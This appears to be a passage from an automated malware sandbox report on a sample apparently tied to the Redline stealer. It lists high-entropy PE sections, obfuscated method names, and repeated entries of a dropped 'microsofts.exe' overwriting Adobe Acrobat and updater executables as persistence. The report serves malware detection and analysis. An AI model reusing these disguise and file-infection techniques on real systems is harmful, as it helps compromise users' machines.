                            Source: chrmstp.exe.5.drStatic PE information: section name: .reloc entropy: 7.941019211695992
                            Source: jucheck.exe.5.drStatic PE information: section name: .reloc entropy: 7.9310613102351475
                            Source: jusched.exe.5.drStatic PE information: section name: .reloc entropy: 7.936029055064351
                            Source: AppVClient.exe.5.drStatic PE information: section name: .reloc entropy: 7.936511844127285
                            Source: FXSSVC.exe.5.drStatic PE information: section name: .reloc entropy: 7.942261525543949
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: section name: .reloc entropy: 7.934753535759687
                            Source: elevation_service.exe.5.drStatic PE information: section name: .reloc entropy: 7.9439315647986515
                            Source: elevation_service.exe0.5.drStatic PE information: section name: .reloc entropy: 7.945943261592593
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                            Persistence and Installation Behavior

                            barindex
                            Creates files in the system32 config directory
                            Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\97dd988331e417df.bin
                            Drops executable to a common third party application directory
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
